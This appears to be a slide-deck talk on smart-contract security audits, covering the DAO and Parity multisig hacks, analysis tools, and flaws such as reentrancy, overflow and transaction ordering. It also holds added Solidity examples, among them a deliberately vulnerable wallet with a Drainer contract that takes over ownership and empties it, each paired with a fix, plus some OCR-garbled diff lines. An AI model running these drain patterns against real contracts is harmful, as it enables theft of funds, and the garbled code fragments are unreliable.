when transactions aren't enough


"The key component is this idea of a Turing-complete blockchain"

-- Vitalik Buterin


now—putting that computing to use

smart contracts


billions, or just millions, of reasons 


[Slide: headline screenshots]

Stephan Tual: "No DAO funds at risk following the Ethereum smart contract 'recursive call' bug discovery"

WIRED: "A $50 Million Hack Just Showed That the DAO Was All Too Human"

Parity Technologies presents the Parity Ethereum browser, "integrated directly into your Web browser"


problem isn’t going away 


Category  | #Candidates flagged (distinct) | Candidates without source | Validated (sampled) | TP rate
Prodigal  | 1,504 (438)                    | 1,487                     |                     |
Suicidal  | 1,495 (403)                    | 1,487                     |                     | 99%
Greedy    | 31,201 (1,524)                 | 31,045                    |                     | 69%
Total     | 34,200 (2,365)                 | 34,019                    |                     |

Table 1 (MAIAN paper): Final results using invocation depth 3 at block height BH. Column 1 reports the number of flagged contracts, and the distinct among these. Column 2 shows the number of flagged contracts which have no source code. Column 3 is the subset sampled for concrete validation. Column 4 reports true positive rates; the total is the average TP rate weighted by the number of validated contracts.


Solidity 


dev tools

* .sol files > bytecode > blockchain
* Atom with plugins:
  * language-ethereum
  * etheratom
* Remix: browser based

[Screenshot: puzzle.sol open in Atom with the etheratom panel (JavaScript VM backend, account 0xca35b7d915458ef540ade6068dfe2f44e8fa733c)]


oyente and Manticore 


[Oyente architecture: Explorer, Analysis, Visualizer, Ethereum State, Z3 Bit-Vector Solver]

    root@01562f60ae20:/oyente/oyente# python oyente.py -s hackertest.sol
    INFO:root:contract hackertest.sol:greeter:
    INFO:symExec:   ============ Results ===========
    INFO:symExec:     EVM Code Coverage:                     99.5%
    INFO:symExec:     Parity Multisig Bug 2:                 False
    INFO:symExec:     Callstack Depth Attack Vulnerability:  False
    INFO:symExec:     Transaction-Ordering Dependence (TOD): False
    INFO:symExec:     Timestamp Dependency:                  False
    INFO:symExec:     Re-Entrancy Vulnerability:             False
    INFO:symExec:   ====== Analysis Completed ======


MAIAN 


MAIAN v1.0 (GUI)

Type of contract code: Solidity source code / Bytecode source / Bytecode compiled
Contract name: WalletLibrary
Checks: Prodigal, Suicidal, Greedy
Settings: Max function invocations: 3, Solver timeout (msec): 10000

Source panel (example_contracts/ParityWalletLibrary.sol):

    //sol Wallet
    // Multi-sig, daily-limited account proxy/wallet.
    // @authors:
    // inheritable "property" contract that enables methods to be protected by requiring the acquiescence of either a
    // single, or, crucially, each of a number of, designated owners.
    // usage:
    // use modifiers onlyowner (just own owned) or onlymanyowners(hash), whereby the same hash must be provided by
    // some number (specified in constructor) of the set of owners (specified in the constructor, modifiable) before the
    // interior is executed.
    pragma solidity ^0.4.9;

    contract WalletEvents {
      // EVENTS

      // this contract only has six types of events: it can accept a confirmation, in which case
      // we record owner and operation (hash) alongside it.
      event Confirmation(address owner, bytes32 operation);
      event Revoke(address owner, bytes32 operation);

      // some others are in the case of an owner changing.
      event OwnerChanged(address oldOwner, address newOwner);
      event OwnerAdded(address newOwner);

Log:

    Compiling Solidity contract from the file example_contracts/ParityWalletLibrary.sol ... Done
    Connecting to PRIVATE blockchain emptychain ... ESTABLISHED
    Deploying contract .... confirmed at address: 0x9E536236A8F2288a7864C6A1AfaA4Cb980464306
    Contract code length on the blockchain: 16528  0x60606040526004361061011d576000357c0100000000000000...
    Contract address saved in file: ./out/WalletLibrary.address

    Check on PRODIGAL
        Vulnerability found
        Vulnerability confirmed (see the log below)

    Check on SUICIDAL
        Search with call depth: 1
        Search with call depth: 2
        Vulnerability found
        Vulnerability confirmed (see the log below)

    [-] Suicidal vulnerability found!
        The following 2 transaction(s) will trigger the contract to be killed:
        -Tx[1] :e46dcfeb 0000...
        -Tx[2] :cbf0b0c0 0000...
        The transactions correspond to the functions:
        -initWallet(address[],uint256,uint256)
        -kill(address)
    [ ] Confirming suicide vulnerability on private chain ... tx[0] mined ... tx[1] mined ...
        Confirmed ! The contract is suicidal !

    Check on GREEDY
        Not vulnerable


basic methodology 


* Interview devs 

* Review .sol file 

* Try compiling 

* Dissect code flow 

* Run oyente (cross fingers) 

* Run Manticore 

* Run MAIAN 

* Manually check for following vulns... 


reentrancy 


    contract ReEntrancy {
        mapping (address => uint) private expendableTokens;

        function stealTokens() public {
            uint amountToLose = expendableTokens[msg.sender];
            // external call first: the callee can re-enter before the balance is zeroed
            if (!(msg.sender.call.value(amountToLose)())) { throw; }
            expendableTokens[msg.sender] = 0;
        }
    }


leave off the first “re-” for savings 


    contract Entrancy {
        mapping (address => uint) private expendableTokens;

        function stealTokens() public {
            uint amountToLose = expendableTokens[msg.sender];
            expendableTokens[msg.sender] = 0;   // zero the balance before the external call
            if (!(msg.sender.call.value(amountToLose)())) { throw; }
        }
    }


reentrancy (and irony) in the dao code 


    // Burn DAO Tokens
    Transfer(msg.sender, 0, balances[msg.sender]);
    withdrawRewardFor(msg.sender); // be nice, and get his rewards
    totalSupply -= balances[msg.sender];
    balances[msg.sender] = 0;
    paidOut[msg.sender] = 0;
    return true;


default public — Parity wallet hack


ff constructor is given number of sigs required to do protected "onlymanyowners" transactions 


// as well as the selection of addresses capable of confirming them. 


function initMultiownedí(address[] owners, uint required) í 
+ function initMultiowned(address[] owners, uint required) internal í 
m numOwners = _owners. length + 1; 


m owners[1] = uint(msg.sender); 


m ownerIndex[uint(msdqd.sender)] = 1; 
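Review bot: the change that matters in this hunk is initMultiowned going from default (public) visibility to `internal`; in the old version it was reachable through the wallet's fallback delegatecall and let any caller rewrite m_numOwners, m_owners[1] and m_ownerIndex, which is how the two transactions shown later install a new owner. The review should also confirm that every other init*/owner-setting function in WalletLibrary got the same treatment, and that the comment describing this function as a "constructor" is reworded, since an `internal` helper invoked from initWallet is not a constructor.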




198,7 %198,7 @@ contract WalletLibrary is Walle 


ff constructor - stores initial daily limit and records the present day's index. 
- function initbpaylimit(uint limit) í 
+ function initDaylimit(uint limit) internal { 


ff constructor - just pass on the owner array to the multiowned and 
// the limit to daylimit 
- function initwallet(address[] owners, uint required, uint _daylimit) í 
+ function initwallet(address[] owners, uint required, uint daylimit) only uninitialized í 
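Review bot: initWallet stays externally callable and now depends entirely on the added `only_uninitialized` modifier, whose body is not in this hunk; the review should confirm it tests state the attacker cannot reset (the wallet's owner count being zero) rather than a separate flag, otherwise a second initWallet call still replaces the owner set. initDaylimit becoming `internal` is consistent with the initMultiowned change; the "constructor" comments above both functions should be reworded for the same reason.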




initWallet transaction (Etherscan)

    Block Height:     4043800
    TimeStamp:        Jul-19-2017 12:18:15 PM +UTC
    From:             0xb3764761e297d6f121e79c32a65829cd1ddb4d32 (MultisigExploit-Hacker)
    To:               Contract 0xbec591de75b8699a3ba52f073428822d0bfc0d7e
    Value:            0 Ether
    Gas Limit:        82703
    Gas Price:        0.000000021 Ether (21 Gwei)
    Gas Used By Txn:  66839
    Actual Tx Cost:   0.001403619 Ether ($0.29)
    Nonce:            5
    Input Data:
      Function: initWallet(address[] _owners, uint256 _required, uint256 _daylimit)
      MethodID: 0xe46dcfeb
      [0]: 0000000000000000000000000000000000000000000000000000000000000060   (offset of the _owners array)
      [1]: 0000000000000000000000000000000000000000000000000000000000000000   (_required = 0)

execute transaction (Etherscan)

    Block Height:     4043802
    TimeStamp:        Jul-19-2017 12:19:36 PM +UTC
    From:             0xb3764761e297d6f121e79c32a65829cd1ddb4d32 (MultisigExploit-Hacker)
    To:               Contract 0xbec591de75b8699a3ba52f073428822d0bfc0d7e
                      TRANSFER 82,189 Ether to 0xb3764761e297d6f121...
    Value:            0 Ether
    Gas Limit:        78926
    Gas Price:        0.000000021 Ether (21 Gwei)
    Gas Used By Txn:  58433
    Actual Tx Cost:   0.001227093 Ether ($0.25)
    Nonce:            6
    Input Data:
      Function: execute(address _to, uint256 _value, bytes _data)
      MethodID: 0xb61d27f6
      [0]: 000000000000000000000000b3764761e297d6f121e79c32a65829cd1ddb4d32   (_to = the attacker)
      [1]: 00000000000000000000000000000000000000000000116779808c03e4140000   (_value = 82,189 ether, in wei)
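Added example (mine, not Parity's code): a stripped-down model of the pattern these two transactions exploited. A thin wallet forwards unknown calls to a shared library with delegatecall, the library's initWallet has neither an access check nor an "already initialised" check, a Drainer contract runs the same init-then-execute sequence, and a corrected library makes init succeed only once. Solidity ^0.8; the contract names, the single-owner simplification and the `onlyUninitialized` modifier name are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Deliberately vulnerable. Library code runs against the wallet's storage via
// delegatecall, so storage layout must match (owner = slot 0, dailyLimit = slot 1).
contract VulnerableWalletLibrary {
    address public owner;
    uint256 public dailyLimit;

    // Meant to run once at deployment; nothing here enforces that.
    function initWallet(address _owner, uint256 _dailyLimit) public {
        owner = _owner;
        dailyLimit = _dailyLimit;
    }

    function execute(address to, uint256 value) public {
        require(msg.sender == owner, "only owner");
        (bool ok, ) = to.call{value: value}("");
        require(ok, "transfer failed");
    }
}

contract VulnerableWallet {
    address public owner;            // slot 0, same as the library
    uint256 public dailyLimit;       // slot 1
    address public immutable lib;    // immutable: lives in code, not in a storage slot

    constructor(address _lib, address _owner, uint256 _dailyLimit) payable {
        lib = _lib;
        (bool ok, ) = _lib.delegatecall(
            abi.encodeWithSignature("initWallet(address,uint256)", _owner, _dailyLimit));
        require(ok, "init failed");
    }

    // Anything not defined here, including a second initWallet(), is forwarded
    // to the library and executes with this contract's storage and balance.
    fallback() external payable {
        (bool ok, ) = lib.delegatecall(msg.data);
        require(ok, "delegatecall failed");
    }
    receive() external payable {}
}

// The two-transaction sequence from the Etherscan records above, in one call:
// 1. initWallet through the wallet: delegatecall sets the wallet's owner to us
// 2. execute through the wallet: the owner check now passes, funds move to us
contract Drainer {
    function drain(address wallet) external {
        (bool ok1, ) = wallet.call(
            abi.encodeWithSignature("initWallet(address,uint256)", address(this), 0));
        require(ok1, "init failed");
        (bool ok2, ) = wallet.call(
            abi.encodeWithSignature("execute(address,uint256)", address(this), wallet.balance));
        require(ok2, "execute failed");
    }
    receive() external payable {}
}

// Fixed: initialisation is guarded by real state (no owner yet), not a flag
// that a later call could clear, so it can only ever succeed once per wallet.
contract SafeWalletLibrary {
    address public owner;
    uint256 public dailyLimit;

    modifier onlyUninitialized() {
        require(owner == address(0), "already initialised");
        _;
    }

    function initWallet(address _owner, uint256 _dailyLimit) public onlyUninitialized {
        require(_owner != address(0), "zero owner");
        owner = _owner;
        dailyLimit = _dailyLimit;
    }

    function execute(address to, uint256 value) public {
        require(msg.sender == owner, "only owner");
        (bool ok, ) = to.call{value: value}("");
        require(ok, "transfer failed");
    }
}
```

Deploy VulnerableWalletLibrary, then VulnerableWallet pointing at it with some ether, then call Drainer.drain(wallet): the wallet balance moves to the Drainer. Swap the library for SafeWalletLibrary and the first step reverts with "already initialised", so the owner check in execute holds. Note that nothing about the storage-layout trick changes in the fix; the only defence is that initWallet can no longer run twice.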


Parity multisig wallet hack 2 


devops199 commented:

"I accidentally killed it."

https://etherscan.io/address/0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4


Parity 2 transactions

    Function: initWallet(address[] _owners, uint256 _required, uint256 _daylimit)
    MethodID: 0xe46dcfeb
    [0..]: owner array, required, daylimit (values not legible in the screenshot)

    Function: kill(address _to)
    MethodID: 0xcbf0b0c0
    [0]: the recipient address for the library's remaining balance


not going with the (over)flow 


OpenZeppelin / zeppelin-solidity: contracts/math/SafeMath.sol (master, 49 lines)

    pragma solidity ^0.4.21;

    /**
     * @title SafeMath
     * @dev Math operations with safety checks that throw on error
     */
    library SafeMath {

      /**
      * @dev Multiplies two numbers, throws on overflow.
      */
      function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
          return 0;
        }
        uint256 c = a * b;
        assert(c / a == b);
        return c;
      }
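Added example (mine, not OpenZeppelin's code): why mul's `c / a == b` check earns its gas. A batch transfer whose `count * value` wraps to zero passes the balance check and credits every receiver, shown beside the SafeMath-guarded version and beside Solidity >= 0.8 default checked arithmetic. The contract name and the `unchecked` block that reproduces pre-0.8 behaviour are mine.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// SafeMath in the style of the library on the slide. On Solidity >= 0.8 the
// compiler performs these checks itself; the library is kept to show what they buy.
library SafeMath {
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        return a - b;
    }
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }
}

contract BatchToken {
    using SafeMath for uint256;
    mapping(address => uint256) public balanceOf;

    constructor() { balanceOf[msg.sender] = 1000; }

    // Pre-0.8 behaviour reproduced with `unchecked`. With two receivers and
    // value = 2**255, receivers.length * value wraps to 0: the balance check
    // passes, the sender pays nothing, and each receiver gains 2**255 tokens.
    function batchTransferUnchecked(address[] calldata receivers, uint256 value) external {
        unchecked {
            uint256 amount = receivers.length * value;      // may wrap to 0
            require(balanceOf[msg.sender] >= amount, "insufficient balance");
            balanceOf[msg.sender] -= amount;
            for (uint256 i = 0; i < receivers.length; i++) {
                balanceOf[receivers[i]] += value;
            }
        }
    }

    // Same logic guarded with SafeMath: the wrapped product fails mul's
    // c / a == b test and the whole call reverts before any balance changes.
    function batchTransferSafeMath(address[] calldata receivers, uint256 value) external {
        uint256 amount = receivers.length.mul(value);
        balanceOf[msg.sender] = balanceOf[msg.sender].sub(amount);   // sub also covers the >= check
        for (uint256 i = 0; i < receivers.length; i++) {
            balanceOf[receivers[i]] = balanceOf[receivers[i]].add(value);
        }
    }

    // Solidity >= 0.8: plain arithmetic reverts on overflow, so this version
    // needs no library and behaves exactly like batchTransferSafeMath.
    function batchTransfer(address[] calldata receivers, uint256 value) external {
        uint256 amount = receivers.length * value;           // reverts on overflow
        balanceOf[msg.sender] -= amount;                     // reverts if amount > balance
        for (uint256 i = 0; i < receivers.length; i++) {
            balanceOf[receivers[i]] += value;
        }
    }
}
```

Call batchTransferUnchecked with two addresses and value 2**255 from the deployer: the deployer still has 1000 and each receiver holds 2**255. The same arguments to either of the other two functions revert. When auditing pre-0.8 code, every `*`, `+` and `-` on a user-controlled value that is not routed through a checked helper deserves this exact thought experiment.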


unchecked send in king of the ether 


[Source: https://github.com/kieranelby/KingOfTheEtherThrone]

    uint compensation = valuePaid - wizardCommission;
    if (currentMonarch.etherAddress != wizardAddress) {
        currentMonarch.etherAddress.send(compensation);   // return value never checked
    } else {
        // When the throne is vacant, the fee accumulates for the wizard.
    }

unchecked send

    if (kingOfLosingDone && !compensationSent) {
        monarch.send(compensation);   // if send() fails (out of gas, contract wallet), the money is silently lost

checked:

    if (kingOfLosingDone && !compensationSent) {
        if (monarch.send(compensation))
            compensationSent = true;
        else throw;


gas limits 


[ethstats.net dashboard: Best Block, Uncles, Last Block, Active Nodes, Gas Price, Gas Limit, Block Time, Difficulty, Block Propagation, Uncle Count, Transactions, Gas Spending]

"This page does not represent the entire state of the ethereum network - listing a node on this page is a voluntary process."

GAS LIMIT (highlighted) - ATTENTION!


withdraw don’t send 


    contract SendContract {
        address public richest;
        uint public mostSent;

        function SendContract() payable {
            richest = msg.sender;
            mostSent = msg.value;
        }

        function becomeRichest() payable returns (bool) {
            if (msg.value > mostSent) {
                richest.send(msg.value);   // pushes ether to an address we do not control
                richest = msg.sender;
                mostSent = msg.value;
                return true;
            } else {
                return false;
            }
        }
    }

withdrawn not sent

    contract WithdrawalContract {
        address public richest;
        uint public mostSent;

        mapping (address => uint) pendingWithdrawals;

        function WithdrawalContract() payable {
            richest = msg.sender;
            mostSent = msg.value;
        }

        function becomeRichest() payable returns (bool) {
            if (msg.value > mostSent) {
                pendingWithdrawals[richest] += msg.value;   // record the credit, let the owner pull it
                richest = msg.sender;
                mostSent = msg.value;
                return true;
            } else {
                return false;
            }
        }

        function withdraw() {
            uint amount = pendingWithdrawals[msg.sender];
            // zero the pending refund before sending to prevent re-entrancy
            pendingWithdrawals[msg.sender] = 0;
            msg.sender.send(amount);
        }
    }


encryption 


Thanks. I win


transaction-ordering dependence

    contract Puzzle {
        address public owner;
        bool public locked;
        uint public reward;
        bytes32 public diff;
        bytes public solution;

        function Puzzle() {             // constructor
            owner = msg.sender;
            reward = msg.value;
            locked = false;
            diff = bytes32(11111);      // pre-defined difficulty
        }

        function() {                    // main code, runs at every invocation
            if (msg.sender == owner) {  // update reward
                if (locked)
                    throw;
                owner.send(reward);
                reward = msg.value;
            }
            else
                if (msg.data.length > 0) {          // submit a solution
                    if (locked) throw;
                    if (sha256(msg.data) < diff) {
                        msg.sender.send(reward);    // send reward
                        solution = msg.data;
                        locked = true;
                    }
                }
        }
    }

The payout depends on the order in which the miner includes transactions: an owner who sees a solution in the mempool can get a reward update (or simply a withdrawal of the old reward) mined first, and the solver is paid whatever is left.
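Added example (mine, not from the Oyente paper or the talk): a commit-reveal rewrite of Puzzle. Because the clear-text solution is only revealed after a binding commitment, a miner or owner who sees the reveal in the mempool gains nothing by reordering it, and the reward paid is the one recorded at commit time. Solidity ^0.8; REVEAL_DELAY, the difficulty constant and the struct layout are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Commit-reveal version of Puzzle. A solver first publishes only
// keccak256(solution, salt, solver); the clear-text solution comes in a later
// block. Copying a reveal out of the mempool is useless without a matching
// earlier commitment, and the reward is frozen per commitment.
contract CommitRevealPuzzle {
    address public owner;
    bytes32 public diff;            // sha256(solution) must be below this target
    uint256 public reward;
    bool public locked;

    struct Commitment {
        bytes32 hash;
        uint256 reward;             // reward on offer when the commitment was made
        uint256 blockNumber;
    }
    mapping(address => Commitment) public commitments;

    uint256 public constant REVEAL_DELAY = 1;   // blocks between commit and reveal (assumed)

    constructor() payable {
        owner = msg.sender;
        reward = msg.value;
        diff = bytes32(uint256(1) << 240);      // assumed difficulty
    }

    // The owner can only add to the reward while the puzzle is open; there is
    // deliberately no function that lets the owner pull funds ahead of a solver.
    function addReward() external payable {
        require(msg.sender == owner && !locked, "not allowed");
        reward += msg.value;
    }

    function commitmentFor(bytes calldata solution, bytes32 salt, address solver)
        public pure returns (bytes32)
    {
        return keccak256(abi.encodePacked(solution, salt, solver));
    }

    // Step 1: commit. Binding msg.sender into the hash stops anyone from
    // re-submitting a copied commitment from their own address.
    function commit(bytes32 commitment) external {
        require(!locked, "already solved");
        commitments[msg.sender] = Commitment(commitment, reward, block.number);
    }

    // Step 2: reveal in a later block. Pays the reward recorded at commit time.
    function reveal(bytes calldata solution, bytes32 salt) external {
        require(!locked, "already solved");
        Commitment memory c = commitments[msg.sender];
        require(c.hash != bytes32(0), "no commitment");
        require(block.number >= c.blockNumber + REVEAL_DELAY, "reveal too early");
        require(commitmentFor(solution, salt, msg.sender) == c.hash, "reveal does not match");
        require(sha256(solution) < diff, "not a valid solution");

        locked = true;                                   // effect before interaction
        uint256 pay = c.reward <= address(this).balance ? c.reward : address(this).balance;
        (bool ok, ) = msg.sender.call{value: pay}("");
        require(ok, "payout failed");
    }
}
```

Two honest solvers who both commit still race on the reveal, and the first reveal mined wins; what the scheme removes is the owner's ability to change the terms after seeing a solution, and a third party's ability to front-run with a stolen solution. Choose a random 32-byte salt per commitment, or the solution can be brute-forced from the commitment when the search space is small.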


call-stack depth limit 


[Oyente output as above, with the "Callstack Depth Attack Vulnerability" line highlighted]
Ethereum (@ethereumproject), 13 Oct 2016:

"Announcement of imminent hard fork for EIP150 gas cost changes:

During the last couple of weeks, the Ethereum network has been the target of a sustained attack. The attacker(s) have been very crafty in locating vulnerabilities in the client implementations as..."


cn 


variable or function ambiguity 


    Player[] persons;
    uint payoutCursor_Id_ = 0;
    uint balance = 0;
    address owner;
    uint payoutCursor_Id = 0;   // a second cursor, differing from the first only by the trailing underscore

    while (balance > persons[payoutCursor_Id_].deposit / 100 * 115) {
        uint MultipliedPayout = persons[payoutCursor_Id_].deposit / 100 * 115;
        persons[payoutCursor_Id_].etherAddress.send(MultipliedPayout);
        balance -= MultipliedPayout;
        payoutCursor_Id++;   // increments the other cursor: payoutCursor_Id_ never advances, so the same player is paid every round
    }


odds and ends 


* Timestamp dependence
* Business logic flaws
* Separating public/private


things might be getting better? 
keep in touch

@KonstantHacker


